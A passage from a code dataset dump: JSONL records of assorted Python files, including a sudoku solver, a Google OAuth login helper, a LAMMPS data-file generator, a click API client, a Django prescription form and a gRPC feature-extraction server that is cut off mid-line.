[logging.DEBUG, logging.INFO, logging.WARN][level]\n except IndexError:\n return logging.INFO\n\n\ndef main(argv=None):\n \"\"\"\n Entrypoint.\n \"\"\"\n if argv is None:\n argv = sys.argv\n\n psr = option_parser()\n (options, args) = psr.parse_args(argv[1:])\n\n if not args and not options.list_engines:\n psr.print_help()\n sys.exit(0)\n\n LOGGER.setLevel(get_loglevel(options.verbose))\n\n if options.list_engines:\n ecs = anytemplate.api.list_engines()\n print(\", \".join(\"%s (%s)\" % (e.name(), e.priority()) for e in ecs))\n return\n\n tmpl = args[0]\n ctx = anytemplate.utils.parse_and_load_contexts(options.contexts,\n options.schema)\n anytemplate.api.render_to(tmpl, ctx, options.output,\n at_paths=options.template_paths,\n at_engine=options.engine, at_ask_missing=True)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n# vim:sw=4:ts=4:et:\n","sub_path":"anytemplate/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370889229","text":"from __future__ import print_function\nimport pickle\nimport os.path\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\n\n\ndef google_auth_login():\n SCOPES = ['https://www.googleapis.com/auth/userinfo.profile https://www.googleapis.com/auth/userinfo.email']\n os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'\n\n credentials = None\n filename = 'google-auth-credentials.json'\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n\n try:\n if not credentials or not credentials.valid:\n if credentials and credentials.expired and credentials.refresh_token:\n credentials.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(filename, SCOPES)\n credentials = flow.run_local_server(port=0)\n\n # with open('token.pickle', 'wb') as token:\n # pickle.dump(credentials, token)\n\n url = 'https://www.googleapis.com/oauth2/v1/userinfo?alt=json&access_token=' + credentials.token\n data = requests.get(url).json()\n return True, (data['family_name'], data['given_name'], data['email'])\n except:\n return False, ()\n","sub_path":"buy-some-food-tema3/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"240189761","text":"import itertools\nfrom utils import *\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in cols]\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\n\n# TODO: Update the unit list to add the new diagonal units\ndiagonal_units = [['A1', 'B2', 'C3', 'D4', 'E5', 'F6', 'G7', 'H8', 'I9'], ['A9', 'B8', 'C7', 'D6', 'E5', 'F4', 'G3', 'H2', 'I1']]\nunitlist = unitlist + diagonal_units\n\n# Must be called after all units (including diagonals) are added to the unitlist\nunits = extract_units(unitlist, boxes)\npeers = extract_peers(units, boxes)\n\n \ndef naked_twins(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n \n Returns\n -------\n dict\n The values dictionary with the naked twins eliminated from peers\n \"\"\"\n for unit in unitlist:\n pairs = [box for box in unit if len(values[box]) == 2]\n possible_twins = [list(pair) for pair in itertools.combinations(pairs, 2)]\n for pair in possible_twins:\n box1 = pair[0]\n box2 = pair[1]\n if values[box1] == values[box2]:\n for box in unit:\n if box != box1 and box != box2:\n for digit in values[box1]:\n values[box] = values[box].replace(digit, '')\n\n return values\n \n\ndef eliminate(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the assigned values eliminated from peers\n \"\"\"\n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n for box in solved_values: \n digit = values[box]\n for peer in peers[box]:\n values[peer] = values[peer].replace(digit, '')\n return values\n\n\ndef only_choice(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with all single-valued boxes assigned\n \"\"\"\n for unit in unitlist:\n for digit in '123456789':\n x = [box for box in unit for digit in values[box]]\n if len(x) == 1:\n values[x[0]] = digit\n return values\n\n\ndef reduce_puzzle(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n Returns\n -------\n dict or False\n \"\"\" \n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n solved = False\n while not solved:\n solved_values_before = [box for box in values.keys() if len(values[box]) == 1]\n values = eliminate(values)\n values = only_choice(values)\n values = naked_twins(values)\n solved_values_after = [box for box in values.keys() if len(values[box]) == 1]\n solved = solved_values_before == solved_values_after\n if len([box for box in values.keys() if len(values[box]) == 0]):\n return False\n return values\n \n\ndef search(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n Returns\n -------\n dict or False\n The values dictionary with all boxes assigned or False\n \"\"\"\n values = reduce_puzzle(values)\n if values == False:\n return False\n\n if all(len(values[s]) == 1 for s in boxes):\n return values ## Solved!\n\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n for value in values[s]:\n new_sudoku = values.copy()\n new_sudoku[s] = value\n attempt = search(new_sudoku)\n if attempt:\n return attempt\n \n\ndef solve(grid):\n \"\"\"\n Parameters\n ----------\n grid(string)\n a string representing a sudoku grid.\n Ex. '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n Returns\n -------\n dict or False\n \"\"\"\n values = grid2values(grid)\n values = search(values)\n return values\n\n\nif __name__ == \"__main__\":\n diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n display(grid2values(diag_sudoku_grid))\n result = solve(diag_sudoku_grid)\n display(result)\n\n try:\n import PySudoku\n PySudoku.play(grid2values(diag_sudoku_grid), result, history)\n\n except SystemExit:\n pass\n except:\n print('We could not visualize your board due to a pygame issue. Not a problem! It is not a requirement.')\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"340934211","text":"import math\nfrom random import shuffle\nimport sys\nimport logo\n\ndef main():\n cs()\n \ndef cs():\n print('\\nData file for core-shell type potential.\\n')\n CF = input('Chemical Formula: ')\n first_line = 'Coreshell: '+CF+'\\n\\n'\n\n cs_nat = int(input('Number of CS atoms type?: '))\n cs_symb=[]\n cs_mass=[]\n cs_charge=[]\n cs_n=[]\n cs_m=[]\n cs_fn=[]\n for i in range(0,int(cs_nat)):\n s = input('Symbol for '+str(i+1)+'-CS atom: ')\n cs_symb.append(s)\n m1 = input('Mass for core of '+s+' atom: ')\n m2 = input('Mass for shell of '+s+' atom: ')\n c1 = input('Charge for core of '+s+' atom: ')\n c2 = input('Charge for shell of '+s+' atom: ')\n cs_mass.append([m1,m2])\n cs_charge.append([c1,c2])\n cn = input('Atom number for core of '+s+': ')\n sn = input('Atom number for shell of '+s+': ')\n cs_n.append([cn,sn])\n n = input('Molecule number of '+s+': ')\n cs_m.append(n)\n n = input('Number of atoms for '+s+' in complete formula: ')\n cs_fn.append(int(n))\n\n ncs_nat = int(input('Number of non-CS atoms type?: '))\n ncs_symb=[]\n ncs_mass=[]\n ncs_charge=[]\n ncs_n=[]\n ncs_m=[]\n ncs_fn=[]\n for i in range(0,int(ncs_nat)):\n s = input('Symbol for '+str(i+1)+'-non-CS atom: ')\n ncs_symb.append(s)\n m1 = input('Mass of '+s+' atom: ')\n c1 = input('Charge of '+s+' atom: ')\n ncs_mass.append(m1)\n ncs_charge.append(c1)\n n = input('Atom number of '+s+': ')\n ncs_n.append(n)\n n = input('Molecule number of '+s+': ')\n ncs_m.append(n)\n n = input('Number of atoms for '+s+' in complete formula: ')\n ncs_fn.append(int(n))\n\n nr = int(input('Number of replecation of base formula: '))\n num_str = str(int(nr)*(2*sum(cs_fn)+sum(ncs_fn)))+' atoms\\n'+str(int(nr)*sum(cs_fn))+' bonds\\n0 angles\\n0 dihedrals\\n\\n' \n typ_str = str(2*cs_nat+ncs_nat)+' atoms types\\n'+str(cs_nat)+' bonds types \\n0 angles types\\n0 dihedrals types\\n\\n' \n\n\n #add_masses\n ad_mass = 'Masses\\n\\n'\n str4=''\n for ind,i in enumerate(cs_n):\n str4 += i[0]+'\\t'+cs_mass[ind][0]+'\\n'\n str4 += i[1]+'\\t'+cs_mass[ind][1]+'\\n'\n for ind,i in enumerate(ncs_n):\n str4 += i+'\\t'+ncs_mass[ind]+'\\n'\n \n\n\n\n #add_atoms\n ad_atoms = '\\nAtoms\\n\\n'\n total_cs_atoms = nr*cs_fn\n total_ncs_atoms = nr*ncs_fn\n total = sum(total_cs_atoms) + sum(total_ncs_atoms) \n exp_bl = 1.6\n\n side = int(math.pow(total,1/3)+1)\n\n coords=[]\n for i in range(side):\n for j in range(side):\n for k in range(side):\n coords.append([str(exp_bl*k),str(exp_bl*j),str(exp_bl*i)]) \n\n\n xyz=[float(min(coords[:][0]))-0.1,float(max(coords[:][0]))+0.1,\n float(min(coords[:][1]))-0.1,float(max(coords[:][1]))+0.1,\n float(min(coords[:][2]))-0.1,float(max(coords[:][2]))+0.1]\n s=['xlo','xhi','ylo','yhi','zlo','zhi']\n dim_str = str(xyz[0])+' '+str(xyz[1])+' '+'xlo xhi\\n'+str(xyz[2])+' '+str(xyz[3])+' '+'ylo yhi\\n'+str(xyz[4])+' '+str(xyz[5])+' '+'zlo zhi\\n\\n'\n\n\n ind1 = [i for i in range(total)]\n shuffle(ind1)\n shift=0\n bshift=1\n str5=''\n str3=''\n str1=''\n for i in range(nr):\n for ind,atoms in enumerate(cs_fn):\n for j in range(atoms):\n str1 += (str(2*shift+1)+'\\t'+cs_m[ind]+'\\t'+cs_n[ind][0]+'\\t'+cs_charge[ind][0]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n str1 += (str(2*shift+2)+'\\t'+cs_m[ind]+'\\t'+cs_n[ind][1]+'\\t'+cs_charge[ind][1]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n str3 += (str(bshift)+'\\t'+str(ind+1)+'\\t'+str(2*shift+1)+'\\t'+str(2*shift+2)+'\\n') \n str5 += (str(2*shift+1)+'\\t'+str(shift+1)+'\\n'+\n str(2*shift+2)+'\\t'+str(shift+1)+'\\n')\n shift += 1\n bshift += 1\n str2=''\n nshift = 1*shift\n for i in range(nr):\n for ind,atoms in enumerate(ncs_fn):\n for j in range(atoms):\n str2 += (str(nshift+shift+1)+'\\t'+ncs_m[ind]+'\\t'+ncs_n[ind]+'\\t'+ncs_charge[ind]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n shift += 1\n\n\n #add_bond\n ad_bonds = '\\nBonds\\n\\n'\n #str3\n\n #add_info\n ad_info = '\\nCS-info\\n\\n'\n #str5\n\n\n\n all_data = first_line+num_str+typ_str+dim_str+ad_mass+str4+ad_atoms+str1+str2+ad_bonds+str3+ad_info+str5\n\n f = open('./CS_datafile','w+')\n f.write(all_data)\n f.close()\n print('\\n\\n'+'\\033[91m'+'\\033[1m'+'Data stored in CS_datafile.'+'\\033[0m'+'\\n\\n')\n\n\n logo.print_logo()\n \n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\": main()\n\n","sub_path":"python_packages/lmps/data_file/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601760590","text":"import numpy as np\n\n\ndef re_mutation_crossover(population_size, target, cross_over_prob, singular_values_selected, mut, j):\n \n \"\"\"\n \n This module will cover the mutation and crossover stages of fNRAND1.\n \n Along with this it is also noted due to mutation and crossover \n there is possiblilty that the trial vector may run out of design space.\n To bring it back to same space, np.clip module is used.\n \n Input : as mentioned above.\n Output : trail vector.\n\n \"\"\"\n \n # Mutation\n ind_vector = [idx for idx in range(population_size) if idx != j] # check to make sure that own index is not\n # selected\n\n vector = []\n for n in ind_vector:\n ind_sum = np.sum((target[j] - target[n]) ** 2)\n vector.append(ind_sum)\n ind = np.argmin(vector)\n\n a = target[ind]\n\n inter_med = np.random.choice(ind_vector, 2,\n replace=False) # here only two position vector are randomly selected in nature\n\n b = target[inter_med[0]]\n c = target[inter_med[1]]\n\n mutant = a + mut * (b - c)\n\n # Cross-over\n cross_points = np.random.rand(singular_values_selected) < cross_over_prob # result in boolean values\n \n if not np.any(cross_points): # check for false value\n cross_points[\n np.random.randint(0, singular_values_selected)] = True # Forcing atleast one index to become true.\n \n trial = np.where(cross_points, mutant, target[j]) # trial vector generator\n \n\n with open('optimizer_input/design_range.csv') as f:\n data = np.loadtxt(f)\n design_space = data[0: singular_values_selected].T\n\n negative_limit = design_space[0]\n positive_limit = design_space[1]\n \n trial = np.clip(trial, negative_limit, positive_limit) # This will clip the values to boundary value in given design space.\n\n return trial\n","sub_path":"Project_code_fNRAND1/re_mut_cross.py","file_name":"re_mut_cross.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"420453808","text":"import json\n\nimport click\nimport requests\n\n\nHOST = '0.0.0.0'\nPORT = '8000'\nBASE_URL = 'http://{}:{}/datasets/'.format(HOST, PORT)\n\n@click.group()\ndef cli():\n \"\"\"\n Command line client group for API endpoints\n \"\"\"\n\n@cli.command('import')\n@click.option('-f',\n '--file',\n required=True,\n prompt=False,\n type=click.Path(exists=True, readable=True),\n help='Dataset file path')\n@click.option('-t',\n '--title',\n required=True,\n prompt=False,\n type=str,\n help='Dataset title')\ndef add_dataset(file, title):\n \"\"\"\n Create endpoint (import dataset)\n \"\"\"\n data = { 'title': title }\n files = {'csv_data': open(file, 'rb')}\n response = requests.post(BASE_URL, data=data, files=files)\n if str(response.status_code)[:2] == '20':\n print('ID of the new dataset: {}'.format(response.json()['id']))\n else:\n click.echo('Status code: {} Cannot add requested dataset'.format(response.status_code))\n\n@cli.command('delete')\n@click.option('--id',\n prompt=False,\n type=int,\n help='Dataset ID to be deleted')\ndef delete_dataset(id):\n \"\"\"\n Delete endpoint (delete dataset)\n \"\"\"\n request_url = BASE_URL + str(id)\n response = requests.delete(request_url)\n if str(response.status_code)[:2] == '20':\n print('ID of the deleted dataset: {}'.format(id))\n else:\n click.echo('Status code: {} Cannot delete requested dataset'.format(response.status_code))\n\n@cli.command('export')\n@click.option('--id',\n prompt=False,\n type=int,\n help='Dataset ID to be exported')\n@click.option('-a',\n '--action',\n prompt=False,\n type=str,\n help='Type of export: plot, stats, excel')\ndef export_dataset(id, action):\n \"\"\"\n Retrieve endpoint (based on actions)\n \"\"\"\n if action is None:\n export_dataset(id)\n elif action == 'plot':\n export_plot(id)\n elif action == 'stats':\n export_stats(id)\n elif action == 'excel':\n export_excel(id)\n\ndef export_dataset(id):\n request_url = BASE_URL + str(id)\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n click.echo(response.json())\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_plot(id):\n request_url = BASE_URL + '{}/plot'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n filename = 'plot_{}.pdf'.format(id)\n with open(filename, 'wb') as f:\n f.write(response.content)\n click.echo('Plot for dataset id {} has been downloaded'.format(id))\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_stats(id):\n request_url = BASE_URL + '{}/stats'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n click.echo(response.json())\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_excel(id):\n request_url = BASE_URL + '{}/excel'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n filename = 'excel_{}.xlsx'.format(id)\n with open(filename, 'wb') as f:\n f.write(response.content)\n click.echo('Excel for dataset id {} has been downloaded'.format(id))\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\n@cli.command('ls')\ndef list_all_datasets():\n \"\"\"\n Retrieve endpoint (list all datasets)\n \"\"\"\n request_url = BASE_URL\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n for dataset in response.json():\n del dataset['dataframe']\n click.echo(dataset)\n else:\n click.echo('Status code: {} Cannot access dataset list'.format(response.status_code))\n","sub_path":"cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"153817259","text":"# Import all the things\nimport pandas as pd\nimport requests\nimport os \n\n# Retreive data from Redash - checkout steps completed by each trainee\n# Remove trainees who had anything happen before 2019-01-01 as we were not \n# systematically tracking this back then\n\napi_key295 = os.environ['REDASH_KEY_QUERY295']\n\ncheckout_progress_url = \"http://redash.carpentries.org/api/queries/295/results.json?api_key=\" + api_key295\n\nr = requests.get(checkout_progress_url)\ncheckout = r.json()['query_result']['data']['rows']\ncheckout = pd.DataFrame(checkout)\ncheckout['completed'] = True\ncheckout_old = checkout[checkout['date'] < \"2019-01-01\"]['trainee_id']\ncheckout = checkout[checkout['date'] > \"2019-01-01\"]\ncheckout=checkout[~checkout['trainee_id'].isin(checkout_old)]\n\n# \"Widen\" the checkout progress table\n# This creates one row for each trainee.\ncheckout_wide = checkout.pivot_table(index='trainee_id', columns = 'requirement', values=\"completed\").reset_index()\ncheckout_wide.fillna(False, inplace=True)\n\n# Drop rows where `Training == False`. These are likely cases where data was incorrectly entered or carryovers from old systems.\n\ncheckout_wide = checkout_wide[checkout_wide['Training'] == True]\n\n# Combine the demo and homework columns as lesson program doesn't matter\n# This \"adds\" the true/false values, to return a 1 (true value)\n\ncheckout_wide[\"Demo\"] = checkout_wide[['SWC Demo', 'DC Demo', 'LC Demo']].any(axis = \"columns\")\ncheckout_wide[\"Homework\"] = checkout_wide[['SWC Homework', 'DC Homework', 'LC Homework']].any(axis = \"columns\")\n\n## Re-order the columns so the necessary ones are at the end.\n\ncheckout_wide = checkout_wide[[ 'DC Demo',\n 'DC Homework',\n 'LC Demo',\n 'LC Homework',\n 'SWC Demo',\n 'SWC Homework',\n 'trainee_id',\n 'Training',\n 'Discussion',\n 'Homework',\n 'Demo']]\n\n# Get just the last columns (`'trainee_id','Training', 'Discussion', 'Homework', 'Demo'`). Save this to a new dataframe\ncheckout_condensed = checkout_wide[['trainee_id','Training', 'Discussion', 'Homework', 'Demo']]\n\n# Aggregate this to a table that has counts grouped by each combination of checkout steps\ncheckout_counts = checkout_condensed.groupby(['Training', 'Discussion', 'Homework', 'Demo']).size().reset_index()\ncheckout_counts.rename(columns={0:\"count\"}, inplace=True)\n\ncheckout_counts.to_json('checkout_counts.json', orient='records')","sub_path":"python/checkout_steps.py","file_name":"checkout_steps.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419427584","text":"TEMPS = np.linspace(.3,.8,5)\n#TEMPS = np.linspace(1.3,1.2,2)\n\nARGS = [instruments, plane2]\nKWARGS = [ {'x':-77, 'y':-14, 'z0':-10,'scan_rate':2}, \n {'x':-350,'y':-100,'z0':-10,'scan_rate':2} ]\nKWARGS_r = {'zstart':-400}\nINST = lakeshore\nPARAM = 'pid_setpoint'\n\n\ndef wait_until_t_stable(t, lakeshore, s):\n starttime = time.time()\n print(\"Waiting until T={0}\".format(t))\n while (starttime + 1800 > time.time()):\n if(abs(lakeshore.T[6] - t) < .01):\n print(\"T={0}\".format(lakeshore.T[6]))\n break;\n time.sleep(10)\n #print(\"Tuning SFlux\")\n #s.autotune_sflux(instruments['daq'], 'dc', P=10, exittime=120)\n\ndef log(measurement, lakeshore):\n measurement.notes = 'Temperature series, T={0}'.format(lakeshore.T[6])\n return 'T={0}'.format(lakeshore.T[6])\n\ntemperatures=[]\nfor T in TEMPS:\n temperatures.append(T)\n temperatures.append(T)\n\nconstructors = [Heightsweep for t in temperatures]\nc_args = [ ARGS for t in temperatures]\nc_kwargs=[ KWARGS[i%2] for i in range(len(temperatures))]\nr_args =[ [] for i in range(len(temperatures))]\nr_kwargs=[ KWARGS_r for i in range(len(temperatures))]\ninstrument_to_varry = [INST for t in temperatures]\ninstrument_parameter = [PARAM for t in temperatures]\nwaitfncts = [wait_until_t_stable for t in temperatures]\nwait_fncts_args = [[t, lakeshore, s] for t in temperatures]\nlog_fncts = [log for t in temperatures]\nlog_fncts_args = [[lakeshore] for t in temperatures]\n\n\nnm = NestedMeasurement(\n constructors,\n c_args,\n c_kwargs,\n r_args,\n r_kwargs,\n instrument_to_varry,\n instrument_parameter,\n temperatures,\n waitfncts,\n wait_fncts_args,\n log_fncts,\n log_fncts_args\n )\n\n#nm.run()\n","sub_path":"2017/09/setups/nested_heightseries_20171002_testing.py","file_name":"nested_heightseries_20171002_testing.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"247866863","text":"\"\"\"\nAdd Prescription form\n\nDjango form for adding medical information.\n\n=== Fields ===\n\npatient -- (CharField) email ID of the patient that is associated with the prescription.\ndrug ----- (CharField) name of the drug being prescribed.\nrefills -- (IntegerField) number of refills available for the prescription.\nnotes ---- (CharField) any notes for the prescriptions.\n\n=== Methods ===\n\n__init__ --------- Initializes the form.\nbuild_form_dict -- Creates a dictionary of all the add prescription forms for each patient.\nhandle_post ------ Creates the prescription given a completed form.\n\"\"\"\n\nfrom django import forms\nfrom django.utils import timezone\nfrom HealthApp import staticHelpers\nfrom HealthApp.models import Prescription, LogEntry, Patient, Message\n\n\nclass AddPrescription(forms.ModelForm):\n def __init__(self, patient):\n super().__init__()\n staticHelpers.set_form_id(self, \"AddPrescription\")\n\n self.fields['patient'] = forms.CharField(widget=forms.HiddenInput(), initial=patient.username)\n\n self.fields['drug'].widget.attrs = {'class': 'form-control', 'placeholder': 'Drug Name'}\n self.fields['refills'].widget.attrs = {'class': 'form-control', 'placeholder': 'Refills'}\n self.fields['notes'].widget.attrs = {'class': 'form-control', 'placeholder': 'Notes'}\n\n class Meta:\n model = Prescription\n fields = ['drug', 'patient', 'refills', 'notes']\n\n @classmethod\n def build_form_dict(cls, all_patients):\n forms_dict = dict()\n\n for patient in all_patients:\n forms_dict[patient.username] = AddPrescription(patient)\n\n return forms_dict\n\n @classmethod\n def handle_post(cls, user_type, doctor, post_data):\n if user_type == staticHelpers.UserTypes.doctor:\n if post_data['drug'] != \"\":\n prescription = Prescription(drug=post_data['drug'], doctor=doctor,\n patient=Patient.objects.get(username=post_data['patient']),\n date=timezone.now(), refills=post_data['refills'],\n notes=post_data['notes'])\n prescription.save()\n if user_type != staticHelpers.UserTypes.patient:\n Message.sendNotifMessage(post_data['patient'], \"New Prescription\", doctor.username +\n \" has created a prescription for \" + post_data['drug'] + \" for you\")\n elif user_type != staticHelpers.UserTypes.doctor:\n Message.sendNotifMessage(doctor.username, \"New Prescription\", doctor.username +\n \" has created a prescription for \" + post_data['drug'] + \" for you\")\n LogEntry.log_action(doctor.username, \"Added prescription for \" + post_data['patient'])\n","sub_path":"HealthApp/forms/add_prescription.py","file_name":"add_prescription.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506618603","text":"## Bulk image resizer\n\n# This script simply resizes all the images in a folder to one-eigth their\n# original size. It's useful for shrinking large cell phone pictures down\n# to a size that's more manageable for model training.\n\n# Usage: place this script in a folder of images you want to shrink,\n# and then run it.\n\nimport numpy as np\nimport cv2\nimport os\nimport sys\nif sys.argv[1] is not None:\n\tdir_path = sys.argv[1]\nelse:\n\tdir_path = os.getcwd()\n\nprint(\"Current Path: \",dir_path)\n\nfor filename in os.listdir(dir_path):\n # If the images are not .JPG images, change the line below to match the image type.\n if filename.endswith(\".JPG\") or filename.endswith(\".jpg\"):\n filename = os.path.join(dir_path,filename)\t\n fileSize = os.path.getsize(filename)\n print(\"Image File: \",filename,fileSize)\n # file> 200KB to convert\n if fileSize > 200*1024:\n\t image = cv2.imread(filename)\n\t resized = cv2.resize(image,None,fx=0.125, fy=0.125, interpolation=cv2.INTER_AREA)\n\t cv2.imwrite(filename,resized)\n","sub_path":"resizer.py","file_name":"resizer.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"436937990","text":"#File I/O Test Question 1\n#Jihal Patel\n#765697\n#ICS4U0-A\n#25 May 2018\n\nfile = open('sX.txt', 'r') #Opens the file containing the input\nfileContents = file.readlines() #Reads each line in the file if there is more than 1\nfile.close() #Closes opened file \nletters = [] #Creates a list to store each letter in the text seperately\ntCount = 0 #Creates a variable to count the \"t\"s and \"T\"s\nsCount = 0 #Creates a variable to count the \"s\"s and \"S\"s\nfor i in range(len(fileContents)): #Goes through each line in the file\n letters.append(list(fileContents[i])) #Seperates every single letter in the file\nfor j in range(len(letters)): #Goes through each line in the file\n for k in range(len(letters[j])): #Goes through each letter in the jth line\n if letters[j][k] == \"t\" or letters[j][k] == \"T\": #Checks if letter is 't' or 'T'\n tCount+=1 #If the letter is 't' or 'T' then add one to tCount\n elif letters[j][k] == \"s\" or letters[j][k] == \"S\": #Checks if letter is 's' or 'S' \n sCount+=1 #If the letter is 's' or 'S' then add one to sCount\nif tCount > sCount: #If there are more 't's or 'T's in the input\n print(\"English\") #Print English if above condition is met\nelif sCount > tCount: #If there are more 's's or 'S's in the input\n print(\"French\") #Print French if above condition is met\nelse: #If both 's's or 'S's and 't's or 'T's are equal\n print(\"French\") #Print French if above condition is met\n","sub_path":"Python/File Reading/File Test 1.py","file_name":"File Test 1.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"507406657","text":"import json\nimport os\nimport time\nfrom concurrent import futures\n\nimport cv2\n# rpc imports\nimport grpc\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\nfrom hysia.dataset.srt_handler import extract_srt\nfrom hysia.models.nlp.sentence import TF_Sentence\nfrom hysia.models.object.audioset_feature_extractor import AudiosetFeatureExtractor\nfrom hysia.models.scene.detector import scene_visual\nfrom hysia.utils.logger import Logger\nfrom hysia.utils.perf import StreamSuppressor\nfrom protos import api2msl_pb2, api2msl_pb2_grpc\n\n# Time constant\n_ONE_DAY_IN_SECONDS = 24 * 60 * 60\n\nSERVER_ROOT = os.path.dirname(os.path.abspath(__file__)) + '/'\n\nlogger = Logger(\n name='feature_extract_model_server',\n severity_levels={'StreamHandler': 'ERROR'}\n)\n\nsentence_model_path = os.path.join(SERVER_ROOT,\n '../../weights/sentence/96e8f1d3d4d90ce86b2db128249eb8143a91db73')\nvggish_fr_path = os.path.join(SERVER_ROOT, '../../weights/audioset/vggish_fr.pb')\n\nvggish_pca_path = os.path.join(SERVER_ROOT, '../../weights/audioset/vggish_pca_params.npz')\n\nresnet_places365_path = os.path.join(SERVER_ROOT, '../../weights/places365/{}.pth')\n\nplace365_category_path = os.path.join(SERVER_ROOT, '../../weights/places365/categories.txt')\n\n\ndef load_sentence_model():\n # Instantiate sentence feature extractor\n return TF_Sentence(sentence_model_path)\n\n\ndef load_audio_model():\n # Instantiate audio feature extractor\n with StreamSuppressor():\n vgg_graph = tf.Graph()\n with vgg_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(vggish_fr_path, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n audio_model = AudiosetFeatureExtractor(vgg_graph, vggish_pca_path)\n return audio_model\n\n\ndef load_image_model():\n # Instantiate scene feature extractor\n return scene_visual('resnet50', resnet_places365_path, place365_category_path, 'cuda:0')\n\n\n# Custom request servicer\nclass Api2MslServicer(api2msl_pb2_grpc.Api2MslServicer):\n def __init__(self):\n super().__init__()\n os.environ['CUDA_VISIBLE_DEVICES'] = '3'\n logger.info('Using GPU:' + os.environ['CUDA_VISIBLE_DEVICES'])\n self.sentence_model = load_sentence_model()\n self.audio_model = load_audio_model()\n self.image_model = load_image_model()\n\n def GetJson(self, request, context):\n res = {}\n meta = request.meta\n meta = meta.split(',')\n # Process entire audio file\n # Extract nlp feature from subtitle\n if 'subtitle' in meta:\n subtitle_path = request.buf.decode()\n logger.info('Extracting from subtitle: ' + subtitle_path)\n start_time = int(meta[1])\n end_time = int(meta[2])\n sentences = extract_srt(start_time, end_time, subtitle_path)\n if len(sentences) == 0:\n sentences_feature = 'unknown_feature'\n sentences = 'unknown_subtitle'\n else:\n # TODO TEXT support what data types (BLOB only support numpy)\n sentences = ' '.join(sentences)\n sentences_feature = self.sentence_model.encode(sentences)\n res['features'] = sentences_feature\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta=sentences)\n\n # Extract audio feature\n if 'audio' in meta:\n audio_path = request.buf.decode()\n logger.info('Extracting from audio: ' + audio_path)\n start_time = int(meta[1])\n end_time = int(meta[2])\n audio_feature = self.audio_model.extract(audio_path, start_time, end_time)[0]\n res['features'] = audio_feature.tolist()\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta='')\n if 'scene' in meta:\n img = 